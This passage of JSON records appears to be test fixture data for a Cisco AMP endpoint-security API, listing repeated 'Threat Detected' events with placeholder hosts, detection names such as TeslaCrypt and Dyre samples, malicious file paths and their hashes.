Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196242","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":69000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196241","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":69000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196240","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259080131183000,"timestamp":1610705857,"timestamp_nanoseconds":996000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259080131182683","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":944000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251507855228943","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":8000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":821000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261640","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":758000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261639","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":2712,"disposition":"Malicious","file_name":"t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":758000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261638","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":680000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261637","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":2712,"disposition":"Malicious","file_name":"t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":665000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261636","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":509000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261635","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259028591575000,"timestamp":1610705845,"timestamp_nanoseconds":984000000,"date":"2021-01-15T10:17:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259028591575130","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251439135752000,"timestamp":1610705841,"timestamp_nanoseconds":455000000,"date":"2021-01-15T10:17:21+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251439135752194","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258981346935000,"timestamp":1610705834,"timestamp_nanoseconds":346000000,"date":"2021-01-15T10:17:14+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258981346934873","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258929807327000,"timestamp":1610705822,"timestamp_nanoseconds":334000000,"date":"2021-01-15T10:17:02+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258929807327320","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":470000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542427","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":112000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542426","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":71000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542425","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":532000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667841684537367","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":454000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667841684537366","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":80000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat 